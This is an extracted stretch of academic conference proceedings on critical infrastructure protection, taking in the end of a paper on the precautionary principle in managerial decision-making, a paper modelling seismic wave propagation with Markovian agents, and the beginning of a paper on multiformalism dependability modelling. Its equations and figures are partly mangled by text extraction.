Evaluation of the quality of knowledge and information. Apart from the amount of K and I, the agent also evaluates its quality. The data can be either significant or insignificant, and also reliable or unreliable. The first division applies to the content of the I or K, the latter to its source. The categories refer to classes of data at and above or below the level of agents acceptability. This same I or K can be accepted or rejected by the agent, depending on the source from which he obtained that I. The evaluation of the amount and quality of I may take place even, if the agent doesnt associate potential losses with an event that may occur. Since the precision and accuracy of the descriptions and predictions made by the agent depend on his IK, should he find his IK not satisfactory, he may not be satisfied with a conclusion that the expected change does not bear risk. The IK evaluation stage is the first stage, at which the agent can apply PP. It is a result of the formulations of PP, whose common denominator is an obligation to adopt measures aimed at risk mitigation, in case of insufficient I or K about the threat. Hence, PP can only be applied if the agent recognises an event or decision as a potential threat and is not satisfied with possessed K or I. Making a decision on risk management strategy.This stage is presented at level 4 of Fig. 1. At this stage of d-m, the agent is able to determine whether the situation is an S p situation and decide about Ap . The choice of Ap depends on several factors, such as losses caused by predicted event or their likelihood. Besides, it depends on generalised, relative cost of current Ap (such as the cost of postponing the decision and searching for new sources of IK or of obtaining new IK from these sources). The costs have to be viewed from a socio-cognitive perspective. Depending on the level of d-m these cost can encompass economical, political, ethical and cultural costs in case of a legislator or additionally costs connected with personal risk (physical or legal connected with sanctions for breaking the law) in case of lower level decision-makers. Generalised cost is assessed subjectively and from the spatial and temporal perspective of the decision maker.
Application of IPK (Information, Preferences, Knowledge) Paradigm
5
325
PP within the Proposed Model
PP is a decisional rule. Its application depends on the situation and the performed or planned action. Not all expected domain changes cause the situation to become S p . As it follows from the most common formulations of PP, it can be applied within the described process at a relatively late stage. In order to carry out Ap the agent has to recognise his situation S as S p . This requires firstly performing a situation assessment and secondly evaluation of possessed IK. Because PP may be costly, also in terms of time, it should be applied only, where it is impossible to apply more efficient strategies. Risk connected with an event depends on the height of expected loss and the likelihood of that event or loss of a particular height. In order to assess risk, the agent has to be able to assess both the loss and the likelihood. Hence, a class of situations requiring application of P P can be identified. Situations in which possible losses and their likelihood are calculable do not require PP. PP is only to be applied, when the probability of an event is not assessable and the expected losses are at least critical or losses are not assessable and the likelihood is at least critical or both factors are not assessable. In other situations the agent either applies a different risk management strategy or refrains from making decisions (e. g. when expected loss or likelihood is less than critical). PP application has its specificity. Decision about carrying out Ap has to be taken in the context of possibilities, since it usually carries additional costs. In order to apply PP the agent usually has to utilise means he has in reserve (time, human resources, monetary means, etc.). Different examples of A can be Ap in even this same situation. Even in very similar situations different ways of applying PP will prove appropriate. The decision depends particularly on agents I about available resources. Besides, whether given A is Ap depends on agents IK. This same decision can be regarded as example of applying PP or applying a different management strategy, depending on the situation (e. g. whether the risk is assessable) (See Gadomski, Zimny [11] for details). Precautionary approach has to be taken also within legislation. The agent requires a proper normative and organizational framework (proper set of P and efficient flow of I and K). Such framework influences decisions made by multiple agents at multiple layers. Improper legal framework can strongly contribute to loss increase. Rules set at different levels should allow: quick response to changes in the domain, efficient communication between different participants of d-m, clear distribution of competencies and responsibilities, proper resources management, including K and I management, identification of main goals and the hierarchy between them. For example, this factor can be very important in case of Large, Complex, Critical Infrastructures (LCCI), where the large number of services, provided in complex and not always foreseen circumstances requires continuous decisions of various subjects, on various layers (Bingham [1]) and also under time constraints. Human organizations and their staffs d-m can be the most vulnerable element of the whole managerial process, require complex and difficult to design, strategies for coping with malfunctions and often they rely on decision support systems (Snediker et al. [18]). PP may often be used wrongly and its application may
326
A.M. Gadomski and T.A. Zimny
lead to undesired results (Hahn et. al. [12]) Paradoxically, the most important precautionary measure in management of risk in many fields (e. g. LCCIs) may be narrowing the field for PP application for low level decision-maker level as much as possible. It has to be done at a higher (legislative) level. The main goal of the authors was to propose a computational modelling framework describing when PP should be applied and the way of its domain-specific specialization. The d-m scheme, we proposed, allows to develop a computer program which could be used to simulate, with limited precision, decision-makers behaviour. Such a program could support already existing LCCI simulators. Also, it could be used to develop the most efficient PP application policy for particular domains of activity. The presented study has a preliminary character. It has been performed in the frame of research and development projects: EU IRRIIS (Integrated Risk Reduction of Information-based Infrastructure Systems), the Italian national project CRESCO (Centro computazionale di RicErca sui Sistemi COmplessi- subproject: Socio-Cognitive Modelling for Complex SocioTechnological Networks), and the ENEAs project on the vulnerability of technological and energy networks.
References 1. Bingham, J.: Security and Safety in Large Complex Critical Infrastructures (2002) (March 15, 2008), www.cs.kent.ac.uk/~ people/~staff/~ rdl~EDCC-4/~Presentations/bighamSlides.pdf 2. Bologna, S., et al.: Dependability and Survivability in Large Complex Critical Infrastructures. In: Anderson, S., Felici, M., Littlewood, B. (eds.) SAFECOMP 2003. LNCS, vol. 2788, pp. 342–353. Springer, Heidelberg (2003) 3. COMEST, 2005 - World Commission on the Ethics of Scientific Knowledge and Technology The Precautionary Principle. Paris UNESCO 4. Cranor, C.F.: Toward Understanding Aspects of the Precautionary Principle. Journal of Medicine and Philosophy 29(3), 259–279 (2004) 5. Ezell, B.C.: Infrastructure Vulnerability Assessment Model (I-VAM). Risk Analysis 27(3), 571–583 (2007) 6. Gadomski, A.M.: TOGA: A methodological and Conceptual Pattern for modeling of Abstract Intelligent Agent. In: Proc. of the First International Round-Table on Abstract Intelligent Agent, January 25-27, 1993, ENEA print (1994) 7. Gadomski, A.M.: TOGA Systemic Approach to the Global Specification. Sophocles Project Report, EU EUREKA (February 12, 2002), http://hid.casaccia.enea.it/RepSoph-v10.pdf 8. Gadomski, A.M.: Socio-Cognitive Engineering Foundations and Applications: From Humans to Nations. Preprints of SCEF 2003 (First International Workshop on Socio-Cognitive Engineering Foundations and Third Abstract Intelligent Agent International Round-Tables Initiative), Rome, September 30 (2003), http://hid.casaccia.enea.it/Gad-PositionPap-5a.pdf 9. Gadomski, A.M.: Human organisation socio-cognitive vulnerability: the TOGA meta-theory approach to the modelling methodology. International Journal of Critical Infrastructures 5(1-2), 120–155 (2009) 10. Gadomski, A.M., et al.: Towards Intelligent Decision Support Systems for Emergency Managers: The IDA Approach. International Journal of Risk Assessment and Management, IJRAM 2(3/4) (2001)
Application of IPK (Information, Preferences, Knowledge) Paradigm
327
11. Gadomski, A.M., Zimny, T.A.: Risk and Precautionary Principle in Managerial Decision Making: the TOGA Meta-theory Socio-cognitive Perspective. In: CRITIS 2008 Pre-Proceedings, pp. 374–386 (2008) 12. Hahn, W., Sunstein, C.R.: The Precautionary Principle as a basis for decision making. The Economics Voice 2(2) (2005) 13. Haimes, Y.Y.: Total Risk Management. Risk Analysis 11(2), 169–171 (1991) 14. Haimes, Y.Y.: The Role of the Society for Risk Analysis in the Emerging Threats to Critical Infrastructures. Risk Analysis 19(2), 153–157 (1999) 15. Haimes, Y.Y.: On the Definition of Vulnerabilities in Measuring Risks to Infrastructures. Risk Analysis 2006(2), 293–296 (2006) 16. Jones, A.: Critical infrastructure protection. Computer fraud & Security 2007(4), 11–15 (2007) 17. Peterson, M.: The Precautionary Principle Is Incoherent. Risk Analysis 26(3), 595– 601 (2006) 18. Snediker, D.E., Murray, A.T., Matisziw, T.C.: Decision support of network disruption mitigation. Decision Support Systems 44, 954–969 (2008)
Disaster Propagation in Heterogeneous Media via Markovian Agents Davide Cerotti1 , Marco Gribaudo1 , and Andrea Bobbio2 1
Dipartimento di Informatica, Universit` a di Torino, Torino, Italy {cerotti,marcog}@di.unito.it 2 Dipartimento di Informatica Universit` a Piemonte Orientale, Alessandria, Italy
[email protected] Abstract. A Critical Infrastructure Protection (CIP) program requires the capability of forecasting how a potential threat originating in some geographical location propagates in an heterogeneous environment. We propose an approach to the disaster propagation analysis based on interacting Markovian Agents. For the sake of illustration, the paper discusses the propagation of a seismic wave and presents an analysis tool, where starting from an arbitrarily chosen geographical map of the region of interest, and fixing the epicenter of the seismic phenomenon, the speed and intensity of the wave are computed and directly displayed on the map.1
1
Introduction
Disaster scenarios involving critical infrastructures are strongly influenced by the geographical location of the infrastructures with respect to the source originating the threat, the properties of the terrain, the propagation attitude of the involved or traversed media. In fact, propagation speed and direction of fire, blast, flooding, contamination or earthquake are primarily determined by the conditions of the terrain or of the surrounding ambient. These conditions are usually highly heterogeneous making an accurate analysis of the threat propagation heavily dependent on local conditions and, in any case, very difficult. A recent approach [3] is based on the construction of a buffer zone around the source of the threat and on the computation of the propagation speed by means of a simple maximum resistance approximation. We propose a more detailed propagation model that exploits the capabilities of a new spatial entity called Markovian Agent (MA) [1]. In the spirit of the usual agent definition [2], a MA is an entity that can evolve autonomously according to some internal rules, but interacts with the environment and with the other agents. In particular, a MA is a finite-state continuous-time homogeneous Markov chain that evolves according to a given transition rate matrix; moreover, the MA can send messages and receive messages. The interaction among MAs is, thus, represented by the exchange of relational entities, called messages, that are emitted by a MA and 1
This work has been partially supported by grant MIUR-PRIN 2007J4SKYP.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 328–335, 2009. c Springer-Verlag Berlin Heidelberg 2009
Disaster Propagation in Heterogeneous Media via Markovian Agents
329
perceived by the other ones influencing their dynamics. The specific interaction among agents is formalized through a propagation function that is a function of the sending and receiving aptitude of the involved MAs but also of their geographical location and of the conductivity features of the traversed media. The general model of interacting MAs has proved to be rather flexible [1], and is suited to cover a variety of different situations in which the global behaviour is determined by the interrelations of smaller entities. In this paper, we show how the use of interacting MAs can be adapted to model the propagation of a threat in an heterogeneous medium. For the sake of illustration, we concentrate on the diffusion of an idealized earthquake wave, in a 2D environment, originating from an epicenter in a given geographical region. The region of interest is partitioned in a grid of small cells with constant geological characteristics. A MA is resident in each cell and its dynamics and transmittance properties depend on the geological characteristics inside the cell. The propagation of the earthquake wave is modelled through the diffusion of messages of different intensity, originated by the MA located at the earthquake epicenter and propagated radially along MAs in adjacent cells. In this way, the property of the terrain and its influence on the speed and intensity of the wave propagation can be tuned very finely cell by cell, and derived from the geological map of the region under consideration.
2
Interacting Markovian Agents
Let V denote the (two-dimensional) geographical region in which we are interested to confine the study of the effects of the seismic wave. Once the map of the selected region is loaded, the earthquake epicenter must be located in any position inside the map. Then, starting from this epicenter, the region V is partitioned in a set of exhaustive and mutually exclusive cells small enough to make reasonable the assumption that the geological and transmittance characteristics of the terrain in each cell are constant. Example of the partition of the Province of Alessandria in Italy is given in Figure 1(a), with a mean cell length of about 1Km. Each cell of the partition is identified by the vector v of the polar coordinates of its central position. The system of polar coordinates has its origin at the epicenter of the earthquake (see Figure 1a), and we assume, in the present paper, that the propagation of the wave is only in the radial direction. The heterogeneity of the terrain and of its geological properties can be defined at the cell level, and derived from the map colors and texture. A single MA is positioned in each cell. A MA is an extension of a continuous time Markov chain, that adds the possibility of generating and receiving messages of different classes. Thus a MA is characterized by its infinitesimal generator, by the probability of sending messages of a given class and by the probability of accepting an arriving message of a given class. Moreover, a propagation function governs the propagation of the messages through the grid of cells. Since the medium is heterogeneous, the parameters of the MA depend on the position v of the cell in which the MA is resident. Furthermore, let us assume
330
D. Cerotti, M. Gribaudo, and A. Bobbio
μ
mL
L
mL
mM
0
M
μ
mL mM
mH
mH mM mL
H
μ
(a)
(b)
Fig. 1. a) Map of the selected region (the Alessandria province); b) The Markovian agent used in the wave propagation
that there are MC classes of messages. More formally, a Markovian Agent MA is a touple: M A(v) = {Q(v), P(v, m), R(v, m)} (1) Where: Q(v) = |qij (v)| is the n × n infinitesimal generator matrix of the continuous time Markov chain of the agent located at v whose entries qij (v) represent the transition rates from state i to state j. P(v, m) = |pij (v, m)| is a set of MC matrices of dimension n × n. Each entry pij (v, m), represents the probability that a message of class m (m = 1, 2, . . . , MC ) is generated in a MA located at v when a transition from state i to j occurs. We have that: MC
pij (v, m) ≤ 1,
∀1 ≤ i, j ≤ n.
(2)
m=1
From the above definitions, we can compute the rate βi (v, m) at which messages of class m are produced in state i in location v: βi (v, m) = qij (v) pij (v, m) (3) j=i
R(v, m) = |rij (v, m)| is a set of MC matrices of dimension n × n, that describe the probability of accepting a message of class m. In particular, a MA in state i at position v has a probability rii (v, m) of ignoring an arriving message of class m and a probability 1−rii (v, m) of accepting it. An accepted message m
Disaster Propagation in Heterogeneous Media via Markovian Agents
331
induces an immediate state change toward state j with probability rij (v, m). We have that: n rij (v, m) = 1 ∀1 ≤ i ≤ n, ∀m (4) j=1
The messages exchange is governed by propagation function u(v, i, v , i , m) that defines how a message of class m generated in state i of a MA located at v arrives in state i of a MA located at v. Since a MA can change state when it accepts a message, the local dynamics of the agent is not only determined by matrix Q(v) but also by the rate at which received messages are accepted. We denote by γi (τ, v, m) the rate at which messages of class m are perceived by a MA in state i in location v, at time τ . The rate γi (τ, v, m) depends on the rate at which messages are generated (Equation 3) and how they are propagated in the traversed medium. γi (τ, v, m) =
n i =1
V
πi (τ, v )u(v, i, v , i , m) βi (v , m) dv
(5)
where πi (τ, v ) is the probability of finding a MA in state i in location v , at time τ . Messages arriving at state i cause a state change to state j according to the acceptance probability of 4. Hence the global transition rate from i to j can be computed as: cij (τ, v) = qij (v) +
MC
γi (τ, v, m) rij (v, m)
(6)
m=1
Defining from 6 a matrix C(τ, v) = |cij (τ, v)|, the state probability vector of each MA can be obtained by solving the standard Chapman-Kolmogorov equation: dπi (τ, v) = πi (τ, v) C(τ, v) dτ
(7)
Equations (7) is solved analytically by an iterative numerical procedure starting from a known initial condition π(0, v).
3
Markovian Agents for Earthquake Propagation
The MA that we propose for the analysis of the propagation of a two-dimensional simplified seismic wave is shown in Figure 1(b). We assume that the intensity of the wave can be discretized in three levels of increasing severity: low (L), medium (M ) and high (H). Correspondingly, there are three classes of messages mL , mM and mH where the suffix denotes the intensity of the wave. The MA has four states: the quiet (non-excited) state is labeled 0, while the states L, M and H, represent the MA in an excited state of low, medium and high intensity, respectively. We assume that a MA can accept messages only when in state 0; hence only the entries r0I (v, m) (I = L, M, H) in 4 are different from 0.
332
D. Cerotti, M. Gribaudo, and A. Bobbio
When the MA in location v is in its 0 state, and accepts a message mI of class I (I = L, M, H), it jumps in the corresponding excited state I. The rates c0I (τ, v) (in dashed line in Figure 1b) are only due to the contribution of the accepted messages (Equation 6): c0I (τ, v) =
MC
γ0 (τ, v, m) r0I (v, m)
m=1
When a MA is in an excited state I it decays to its quiet state 0 by emitting a mixture of messages of intensity equal or lower than I. The decay rates cI0 (τ, v) = qI0 (v) (represented in solid line in Figure 1b) are only due to the contribution of the local infinitesimal generator. The propagation function u(v, i, v , i , m) is defined in such a way that a message emitted in cell v can reach only the adjacent cells in the radial direction with an intensity given by a transmittance coefficient α times the distance between the two adjacent cells. Thus the messages propagate by traversing one cell at the time in the radial direction. In each cell v, we define the following parameters that take into account the heterogeneity of the propagation medium: 1. qI0 (v) = μ ; (for I = L, M, H) - Once a MA is excited, the parameter 1/μ gives the mean time to return to state 0 by sending messages of intensity distributed according to a probability distribution determined by the parameter σ. Hence, μ tunes the speed at which an excited MA decays emitting the wave messages. 2. σ - This parameter affects the probability of the mixture of the emitted messages. A MA in the excited state I, can emit messages of intensity I equal or lower than I (see Figure 1b), according to a binomial distribution of parameter σ. 3. α - This parameter is proportional to the transmittance of the medium and enters into the propagation function u(v, i, v , i , m). If starting from v there is only one radial adjacent cell in the grid v, at a distance dvv , then u(v, i, v , i , m) = α dvv (and 0 elsewhere). If starting from v there are n radial adjacent cells in the grid, then u(v, i, v , i , m) = α/n dvv (and 0 elsewhere). To start the seismic wave, we can chose a cell located at any position v of the grid of Figure 1 as epicenter, and assume that at τ = 0 the corresponding MA is in some excited state; i.e: π0 (0, v ) = 0 πI (0, v ) = aI ≥ 0 aI = 1 I=L, M, H
4
Results
We have evaluated the dynamics of the seismic wave propagation over the grid of cells, solving the differential equations using a first order method. The region
Disaster Propagation in Heterogeneous Media via Markovian Agents
Pr(L) 0.00072 0.00063 0.00054 0.00045 0.00036 0.00027 0.00018 9E−05
− 40 − 30 − 20 − 10 0
0
10
10
0 20 40 50 − 30
30 − 20 − 10 − 0
20
10
30 40 50 40
40
60
50
20 30
30 60
0 10
10
30
40 −
20
10
− 10
− 10 0
20
− 30 − 20
− 20
0
60 − 40
60 − 40 − 30
10 −
50
50
30 −
40
40
20 −
30
30
40 −
20
20
40 50 − 30
10
10 20
40
10 −
10 −
(a) t = 0 s
20 −
20 −
0
30 −
30 −
− 20
40 −
40 −
− 10
50 −
50 −
− 40
Pr(L) 1 0.875 0.75 0.625 0.5 0.375 0.25 0.125
− 30
333
(b) t = 5 s
Fig. 2. Spatial wave intensity at two time instants as a function of α
V of the map is partitioned in about 1200 cells with radial dimension of about 1 Km (the dimension of the cell is an optional parameter to be set by the user). For all the numerical computations, the time discretization step is assumed to be Δt = 0.01 s (but also Δt is an optional parameter to be set by the user). Since the input map is colored according to the geological properties of the terrain, the input parameters μ, σ and α assigned to each cell, are extracted from the intensity of the colors of the cell. To illustrate the potentialities and the possible results of the proposed methodology, we have performed several experiments. Dependence on α - The objective of the first experiment is to show how our model can capture the effect of the heterogeneities in the terrain transmittance (parameter α) on the intensity of the wave propagation. To this aim, we assume (arbitrarily) that α changes in the region according to the color map represented in the bottom part of Figure 2. Darker zones correspond to higher values of the parameter, lighter zones to lower values. The region is traversed by a river (the Po river) that is colored in white corresponding to α = 0. Based on the previous discussion, a low value of α prevents the propagation of messages, meaning that the wave does not cross the river (in effect the longitudinal seismic waves are stopped by the water). The numerical results are obtained from an initial situation where the MA located in the epicenter is excited with a low intensity message, only. Therefore only messages of type L are propagated. Figure 2 gives an histogram of the wave intensity at two different time instants (t = 0; t = 5 s). The intensity is measured as the probability of the MA located in each cell of being in the excited state L. As we could expect, the wave presents an asymmetric propagation front due to the varying terrain features, and the wave intensity is higher in the direction and in the zones in which the values of the parameter α are higher. Dependence on μ - The second experiment was designed to demonstrate how our model can capture the variations in the speed propagation represented by the parameter μ. To show this effect, we have defined three areas with different average values of μ (the average values of μ in the three zones are μ 4.5, 4.0, 3.0 s−1 ), as shown in the left hand side of Figure 3. The value 1/μ
334
D. Cerotti, M. Gribaudo, and A. Bobbio
Fig. 3. Probability of being in the excited state L versus time for the selected points
represents the mean decay time of a MA in an excited state, thus represents the mean time that the wave takes to cover the distance between two adjacent cells. To show the anisotropy of the propagation we have selected three points on the map, labeled a, b, c, located in the three zones with different average μ and at the same distance of 10 Km from the epicenter. We have computed the probability that the MAs located in the selected points are in the excited state, and the results are compared in the right side of Figure 3. The time to reach a cell is lower when the wave traverses a zone with high μ. Point a and b belongs to the darker zones for μ, therefore they are reached earlier by the seismic wave; however, since the path leading to point b experiences lower values of the transmittance α, the peak intensity is much lower than the one for the cell at point a. Point c lies in the zone where parameter μ is lower, and thus it is the last to be reached. Note however, that the speed of the wave and its intensity can be tuned independently by acting on the values of α and μ. Dependence on σ - The aim of the third experiment was to show the influence of the parameter σ (0 ≤ σ ≤ 1) whose value determines the mixture of the message intensities among the three levels I = L, M, H. A value of σ close to 1 favors the emission of messages of the highest intensity, while a value close to 0 shifts the intensity toward lower values. As in the previous experiment we have defined three areas for σ with different color intensities, as shown in the top-left corner of Figure 4. To start the earthquake we have set, as initial condition, that the MA at the epicenter is in state H with probability 1. Hence, initially only a message of intensity H is emitted that is degraded passing from cell to cell depending on the value of σ. The results are shown in Figure 4 for the same three points a, b, c considered in the previous experiment. The figures display the probabilities of the excited states L, M and H, for the MAs located in the selected points. Point b is in the zone with highest σ then point a and c, therefore the probability of excitation at all levels of intensity is the greatest in point b followed by points c and a as shown in Figure 4.
Disaster Propagation in Heterogeneous Media via Markovian Agents
335
Fig. 4. Probability of points a, b, c of being in the excited states I = L, M, H versus time
5
Discussion and Conclusions
We have shown that a system of interacting Markovian Agents may be adapted to analyze the propagation of a critical phenomenon in a heterogeneous environment and the present study is intended to exemplify the power and flexibility of the technique based on MAs. We have presented a fine-grained earthquake propagation model that can be directly exercised on a real geographical region whose map can be downloaded in a standard graphical format. The geological features of the terrain in the chosen region are defined by three parameters that can be tuned independently, giving to the proposed model a high flexibility. The parameter 1/μ gives the average traversal time of two adjacent cells; the transmittance parameter α reduces the signal intensity as a function of the distance; and, finally, the parameter σ mixes the three levels of the signal intensities at each emission. The overall computational cost of the analysis is affordable on a laptop PC.
References 1. Cerotti, D., Gribaudo, M., Bobbio, A.: Analysis of on-off policies in sensor networks using interacting Markovian agents. In: 4th Int. Workshop PerSens 2008, pp. 300– 305 (2008) 2. Russell, S., Norvig, P.: Artificial Intelligence: A Modern Approach. Prentice-Hall, Englewood Cliffs (2003) 3. Svendsen, N.K., Wolthusen, S.D.: A framework for 3D geospatial buffering of events of interest in critical infrastructures. In: Lopez, J., H¨ ammerli, B.M. (eds.) CRITIS 2007. LNCS, vol. 5141. Springer, Heidelberg (2008)
A Study on Multiformalism Modeling of Critical Infrastructures Francesco Flammini1,2 , Valeria Vittorini2 , Nicola Mazzocca2 , and Concetta Pragliola1 1
ANSALDO STS - Ansaldo Segnalamento Ferroviario S.p.A. Via Nuova delle Brecce 260, Naples, Italy {francesco.flammini,concetta.pragliola}@ansaldo-sts.com 2 Universita’ di Napoli ”Federico II” Dipartimento di Informatica e Sistemistica Via Claudio 21, Naples, Italy {frflammi,valeria.vittorini,nicola.mazzocca}@unina.it
Abstract. This paper explores the possibility of using multiformalism techniques for critical infrastructure modeling and proposes a general scheme for intra and inter infrastructure models. Multiformalism approaches allow modelers to adapt the choice of formal languages to the nature, complexity and abstraction layer of the subsystems to be modeled. Another advantage is the possibility of reusing existing (and validated) dependability models and solvers. Complexity and heterogeneity are managed through modularity, and composition allows for representing structural or functional dependencies. Keywords: Critical Infrastructure, Dependability, Security, Performability, Multiformalism Modeling.
1
Introduction
Several frameworks have been proposed in the research literature in order to cope with critical infrastructure modeling issues, and almost all rely on simulation techniques. Simulation allows to evaluate the effect of a fault in on the infrastructure itself (in terms of produced failures and reduction of operating capacity) and on the other dependant infrastructures. Such kind of qualitative analysis is known as a “what if” study and it is able to demonstrate the possibility that a certain undesired event can happen, but is not able to demonstrate that a certain undesired event can never happen. Generally speaking, simulation does not allow to: – analytically evaluate quantitative dependability attributes (such as Mean Time Between Hazardous Events, Vulnerability, Mean Down Time, etc.); – verify properties on the model, like Safety related ones (e.g. the possibility to reach an unsafe state, the possibility that two specified infrastructures are unavailable at the same time, etc.). R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 336–343, 2009. c Springer-Verlag Berlin Heidelberg 2009
A Study on Multiformalism Modeling of Critical Infrastructures
337
In order to overcome such limitations, formal methods are widely used in the community of dependability experts in order to evaluate the attributes of interest. However, as the system grows in complexity and heterogeneity a single modeling language reveals almost always inadequate. In order to balance expressive power, ease of use and efficiency, multiformalism techniques have been proposed. Multiformalism allows to adapt the modeling formalism to the nature and level of abstraction of the subsystem to be modeled and provide the modeler with a single cohesive view of the entire system. Modularity and compositionality ease modeling and also allows for the reuse of components. This paper explores the possibility of using multiformalism approaches for critical infrastructure modeling, which represents the first stage (analysis) in critical infrastructure protection life-cycle. The objective is achieved by transferring the methods and exploiting the results which are already available for the modeling of other classes of critical systems. A brief survey of formal techniques and multiformalism frameworks is presented, highlighting advantages and limitations of each of them. A general scheme for compositional modeling of critical infrastructures is proposed, which constitutes the main contribution of this paper with respect to the state of the art. Furthermore, a basic combination of modeling formalisms is discussed and some hints are provided in order to cope with solving efficiency issues.
2
State of the Art
An extensive survey of current projects on CI modeling is provided in [10]. Among these works, some are general and mostly oriented to network topology analysis (graph theory) and agent-based simulation, while others are tailored to specific infrastructures, mostly electricity distribution networks. A survey of model-based dependability and security evaluation techniques is presented in [9]. The word ”performability” [8] expresses the composite attribute of a system representing its capacity to operate in degraded conditions in presence of one or more failures. The concept also applies to critical infrastructures, where the word ”performance” can be substituted by ”operating capacity”. Several graphical formalisms can be adopted to model at least some aspects of critical infrastructures, most of which are widespread for the analysis of computer systems: Queuing Networks (QN), Fault Trees (FT), Reliability Block Diagrams (RBD), Continuous Time Markov Chains (CTMC), Stochastic Petri Nets (SPN), Stochastic Activity Networks (SAN), Timed Automata (TA), Process Algebras (PA), Bayesian Networks (BN). Furthermore, many extensions of classical formalisms have been proposed in order to overcome their limitations in expressive power or solving efficiency (see e.g. [4]). The advantages and limitations of each modeling language highlights the importance of trade-offs between simplicity (ease of use, readability, maintainability), expressive power and solving efficiency. Multiformalism modeling allows to fine tune the choice of modeling language to the problem to be solved, using a modular and compositional approach. This also seems to fit well the concept of Hierarchical Holographic Modeling (HHM) proposed
338
F. Flammini et al.
in [3]. Sanders [11] has provided a survey on multiformalism multilevel modelling frameworks, including SHARPE, AToM3, DEDS, SMART and M¨ obius. These frameworks differ for several features, including the basic multiformalism strategy (e.g. the use of a high-level abstract formalisms in which translating all submodels), the possibility of model connection (result exchange) or composition (state / event sharing), the support for meta-modeling and multi-paradigm modeling, etc. OsMoSys is a new multi-formalism framework supporting multisolution, meta-modeling and object-oriented paradigms (including formalism inheritance and model polymorphism). The open software architecture allows for the reuse of both formalisms and models and the integration of any existing solvers/applications (including other multiformalism tools) which are wrapped by adapters and managed by a specific workflow engine [2]. OsMoSys supports both implicit and explicit multiformalism and has been adopted to model complex systems reliability [5]. An important issue in multiformalism modeling is the interaction among components [6], which requires introducing proper connection/composition operators. Such operators are needed in HHM to account for intra/inter-infrastructure and intra/inter-layer model interaction. Another issue is the management of complexity, which is addressed by several means, including symmetrical modeling, model equivalency, divide-et-impera approaches based on hierarchical decomposition, etc. State-based formalisms are suitable to be model-checked with the aim of verifying desired properties. One way to model-check multiformalism models is by performing a translation of all submodels (including non state-based ones) in a single high-level formalism [1]. The problem of complexity management in model-checking is still open, though some techniques based on abstraction (symbolic model-checking) and backward analysis have been proposed. All the aforementioned issues are relevant for the multiformalism modeling of CI and therefore need to be addressed. However, the application of formal verification techniques is theoretically possible even on agent based systems [7].
3
Multiformalism Modeling of Critical Infrastructures
CI modeling requires taking into account internal infrastructure dynamics (intra-infrastructure models) and the interaction among different infrastructures (inter-infrastructure models). As first, let us consider a single infrastructure. The following aspects need to be addressed: 1. The failure modes of the infrastructure, in terms of: (a) Effects of the occurred damages on assets, environment and people; (b) Outage time and required maintenance; (c) Reduction in the operational capacity. 2. The dynamic of internally originated faults (fault-error-failures chain), both natural and human-made malicious, and of the related recovery procedures; 3. The propagation to other infrastructures of: (a) failures having external effects; (b) reduction of operational capacity.
A Study on Multiformalism Modeling of Critical Infrastructures
339
4. The dynamic of externally originated faults, that is to say of the ones induced from other infrastructures, which can be: (a) failures received from the other infrastructures; (b) reduction of the operational capacity (caused by a correspondent reduction in the other infrastructures). For a class of critical systems, the data required for point (1) is provided by qualitative analyses performed on the single infrastructure, including Hazard Analysis, Failure Mode and Effect Analysis (FMEA) and, for external malicious faults, Security Risk Analysis. For these systems, failure models are usually needed for the demonstration of RAMS (Reliability Availability Maintainability Safety) properties; however, such models only account for random faults. In a growing number of cases, security related vulnerability models are also available, when a Quantitative Risk Assessment (QRA) has been performed on the infrastructure. Whenever available, these models should provide the necessary inputs for point (2). Points (3) and (4) relate to the interaction among the network of infrastructures, in order to model the propagation of faults and the effect of reduction of the operational capacity of one infrastructure on the other interacting infrastructures. Interaction models must be developed in order to represent such interdependencies. A general scheme for modular and compositional modeling of the single infrastructure K in a context of N infrastructures is proposed in Fig. 1, which is independent from the modeling languages used to represent submodels. The scheme is a block-diagram composed internally by a set of (typically heterogeneous) models, internally featuring three main vertical layers: – Failure modeling layer (including Kf submodels); – Recovery modeling layer (including Kr submodels); – Operational capacity modeling layer (including Kc submodels). And three horizontal layers: – Internal failure/recovery/capacity layer; – Two interface layers, that is: • The input (i.e. received) failures/capacity layer; • The output (i.e. propagated) failures/capacity layer. For instance, R.F. submodel J.K represents the effects on infrastructure K of failures originated by infrastructure J. Macro-blocks of the reference scheme could be divided into more layers in order to ease modeling by using divide-et-impera approaches (e.g. separation of concerns between hardware and software layers). Additional layering can also account for organizational, social or other non technical aspects. The internal models refer to points (1) and (2) reported above. In particular, the internal recovery model specializes on representing the restore process and the degraded operating modes which are a consequence of failure, emergency or crisis situations. The internal capacity layer models the effects of failures on the operating capacity of the same infrastructure. The input/output interface models
340
F. Flammini et al.
account for the interaction with other infrastructures as reported in points (3b) and (4b). The interaction between the models must be provided by composition operators, which can be simple connectors in their basic form. Such operators can be of the following types: – intra-infrastructure, that is connecting submodels of the same infrastructure, which can be further divided into: • intra-layer, that is connecting models belonging to the same layer; • inter-layer, that is connecting models of different layers; – inter-infrastructure, that is connecting models belonging to different infrastructures. The last class of operators are used to model infrastructure interdependencies and are therefore linked to the aforementioned interface models.
MODEL OF CRITICAL INFRASTRUCTURE K
CAPACITY SUBMODEL K 1 R.C. SUBMODEL 1.K
...
INTERNAL CAPACITY MODEL
...
... IN: CAPACITY
R.C. SUBMODEL (N-1 ).K
INPUT INTERFACE MODELS
IN: FAILURES
CAPACITY SUBMODEL Kc
... P.C. SUBMODEL (N-1).K
RECOVERY SUBMODEL K 1
OUT: CAPACITY
...
INTERNAL RECOVERY MODEL
...
RECOVERY SUBMODEL Kr
R.F. SUBMODEL 1.K
OUTPUT INTERFACE MODELS P.F. SUBMODEL 1.K
... R.F. SUBMODEL (N-1 ).K
P.C. SUBMODEL 1.K
OUT: FAILURES
... FAILURE SUBMODEL K 1
...
INTERNAL FAILURE MODEL
...
P.F. SUBMODEL (N-1).K
FAILURE SUBMODEL Kf
N: total number of interacting infrustructures R.C.: Received Capacity R.F.: Received Failures P.C.: Provided Capacity P.F.: Provided Failures
Fig. 1. A modular scheme for intra-infrastructure models
In the reference scheme of Fig. 1 it should be noticed that while the data flowing through horizontal layers is unidirectional (left to right), since it follows a precise input-output relation, data exchanged among vertical layers is bidirectional. In fact, capacity, failure and recovery macro-blocks influence one each other. For instance, when the infrastructure is overstressed (e.g. due to the unavailability of other infrastructures), a failure can be originated, hence the downward connection. Similarly, a non malicious fault in performing corrective maintenance interventions or executing recovery procedures could itself originate
A Study on Multiformalism Modeling of Critical Infrastructures
CI (N-1)
OP 1.K
...
...
CI 1
